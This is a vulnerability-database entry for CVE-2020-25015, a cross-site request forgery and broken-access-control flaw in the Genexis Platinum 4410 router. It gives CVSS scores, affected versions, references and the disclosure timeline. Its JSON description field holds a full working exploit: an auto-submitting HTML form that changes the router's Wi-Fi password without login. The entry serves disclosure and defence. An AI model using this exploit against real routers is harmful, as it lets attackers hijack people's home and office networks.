VAR-202009-0727
Vulnerability from variot - Updated: 2024-02-13 23:03

A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices, was found to be vulnerable to Broken Access Control and CSRF, which could be combined to remotely change the WIFI access point’s password. Genexis Platinum 4410 contains a cross-site request forgery vulnerability. Information may be tampered with. Genexis Platinum 4410 is a router made by Genexis. An attacker can use this vulnerability to send unexpected requests to the server through the affected client.

Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF
Date: 28-08-2020
Vendor Homepage: https://www.gxgroup.eu/ont-products/
Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)
Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/
Version: v2.1 (software version P4410-V2-1.28)
CVE : CVE-2020-25015
Proof of Concept
Create an HTML file with the following code:
history.pushState('', '', '/')
document.forms[0].submit();

Open this file in a browser while you are connected to the WIFI. There is no need for the victim to be logged in to the Router admin panel (192.168.1.1). It can be seen that the WIFI connection is dropped. To reconnect, forget the WIFI connection on your laptop or phone and connect using the newly changed password: NEWPASSWORD
PoC Video: https://www.youtube.com/watch?v=nSu5ANDH2Rk&feature=emb_title
Timeline
Vulnerability reported to the Genexis team – August 28, 2020
Team confirmed firmware release containing fix – September 14, 2020
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202009-0727",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "platinum 4410",
"scope": "eq",
"trust": 1.0,
"vendor": "genexis",
"version": "p4410-v2-1.28"
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": null
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": "genexis platinum-4410 firmware 2-1.28"
},
{
"model": "platinum",
"scope": "eq",
"trust": 0.6,
"vendor": "genexis",
"version": "4410v2-1.28"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:genexis:platinum_4410_firmware:p4410-v2-1.28:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:genexis:platinum_4410:2.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jinson Varghese Behanan",
"sources": [
{
"db": "PACKETSTORM",
"id": "159936"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
],
"trust": 0.7
},
"cve": "CVE-2020-25015",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2020-25015",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2020-56086",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2020-25015",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-25015",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2020-56086",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202009-1006",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-25015",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point\u2019s password. Genexis Platinum 4410 Contains a cross-site request forgery vulnerability.Information may be tampered with. Genexis Platinum 4410 is a router of genexis. An attacker can use this vulnerability to send unexpected requests to the server through the affected client. # Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF\n# Date: 28-08-2020\n# Vendor Homepage: https://www.gxgroup.eu/ont-products/\n# Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)\n# Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/\n# Version: v2.1 (software version P4410-V2-1.28)\n# CVE : CVE-2020-25015\n\n1. \n\n2. \n\n3. Proof of Concept\n\nCreate an HTML file with the following code:\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/cgi-bin/net-wlan.asp\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"wlEnbl\" value=\"ON\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlKeys0\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlKeys1\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlKeys2\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlKeys3\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlgMode\" value=\"9\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlAuthMode\" value=\"WPAPSKWPA2PSK\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlEnbl\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"hWPSMode\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"henableSsid\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" 
name=\"hwlHide\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"isInWPSing\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"WpsConfModeAll\" value=\"7\" /\u003e\n \u003cinput type=\"hidden\" name=\"WpsConfModeNone\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"hWpsStart\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"isCUCSupport\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"SSIDPre\" value=\"N\u0026#47;A\" /\u003e\n \u003cinput type=\"hidden\" name=\"bwControlhidden\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"ht\u0026#95;bw\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlgMode\" value=\"b\u0026#44;g\u0026#44;n\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlChannel\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlTxPwr\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlSsidIdx\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"SSID\u0026#95;Flag\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlSsid\" value=\"JINSON\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlMcs\" value=\"33\" /\u003e\n \u003cinput type=\"hidden\" name=\"bwControl\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"giControl\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"enableSsid\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlAssociateNum\" value=\"32\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlSecurMode\" value=\"WPAand11i\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlPreauth\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlNetReauth\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlWpaPsk\" value=\"NEWPASSWORD\" /\u003e\n \u003cinput type=\"hidden\" name=\"cb\u0026#95;enablshowpsw\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlWpaGtkRekey\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlRadiusIPAddr\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlRadiusPort\" 
value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlRadiusKey\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlWpa\" value=\"TKIPAES\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeyBit\" value=\"64\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"WpsActive\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"wpsmode\" value=\"ap\u0026#45;pbc\" /\u003e\n \u003cinput type=\"hidden\" name=\"pinvalue\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"Save\u0026#95;Flag\" value=\"1\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003cscript\u003e\n document.forms[0].submit();\n \u003c/script\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\nOpen this file in a browser while you are connected to the WIFI. There is no need for the victim to be logged in to the Router admin panel (192.168.1.1). It can be seen that the WIFI connection is dropped. To reconnect, forget the WIFI connection on your laptop or phone and connect using the newly changed password: NEWPASSWORD\n\n\n4. PoC Video: https://www.youtube.com/watch?v=nSu5ANDH2Rk\u0026feature=emb_title\n\n3. Timeline\n\nVulnerability reported to the Genexis team \u2013 August 28, 2020\nTeam confirmed firmware release containing fix \u2013 September 14, 2020\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "PACKETSTORM",
"id": "159936"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-25015",
"trust": 3.2
},
{
"db": "PACKETSTORM",
"id": "159936",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-56086",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "49000",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2020-25015",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "PACKETSTORM",
"id": "159936"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"id": "VAR-202009-0727",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
}
],
"trust": 1.3232142850000002
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
}
]
},
"last_update_date": "2024-02-13T23:03:44.191000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "https://www.gxgroup.eu/"
},
{
"title": "Patch for Genexis Platinum cross-site request forgery vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/236092"
},
{
"title": "Genexis Platinum Fixes for cross-site request forgery vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=128996"
},
{
"title": "https://github.com/jinsonvarghese/jinsonvarghese",
"trust": 0.1,
"url": "https://github.com/jinsonvarghese/jinsonvarghese "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.0
},
{
"problemtype": "Cross-site request forgery (CWE-352) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/159936/genexis-platinum-4410-p4410-v2-1.28-missing-access-control-csrf.html"
},
{
"trust": 2.6,
"url": "https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/"
},
{
"trust": 2.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25015"
},
{
"trust": 1.7,
"url": "https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410/"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/49000"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/352.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/jinsonvarghese/jinsonvarghese"
},
{
"trust": 0.1,
"url": "https://www.gxgroup.eu/ont-products/"
},
{
"trust": 0.1,
"url": "https://www.youtube.com/watch?v=nsu5andh2rk\u0026feature=emb_title"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/cgi-bin/net-wlan.asp\""
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "PACKETSTORM",
"id": "159936"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "PACKETSTORM",
"id": "159936"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-10-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"date": "2020-09-16T00:00:00",
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"date": "2021-03-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"date": "2020-11-09T17:26:50",
"db": "PACKETSTORM",
"id": "159936"
},
{
"date": "2020-09-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"date": "2020-09-16T18:15:13.390000",
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-10-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"date": "2022-11-16T00:00:00",
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"date": "2021-03-24T06:57:00",
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"date": "2020-11-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"date": "2022-11-16T14:14:45.577000",
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Genexis Platinum cross-site request forgery vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.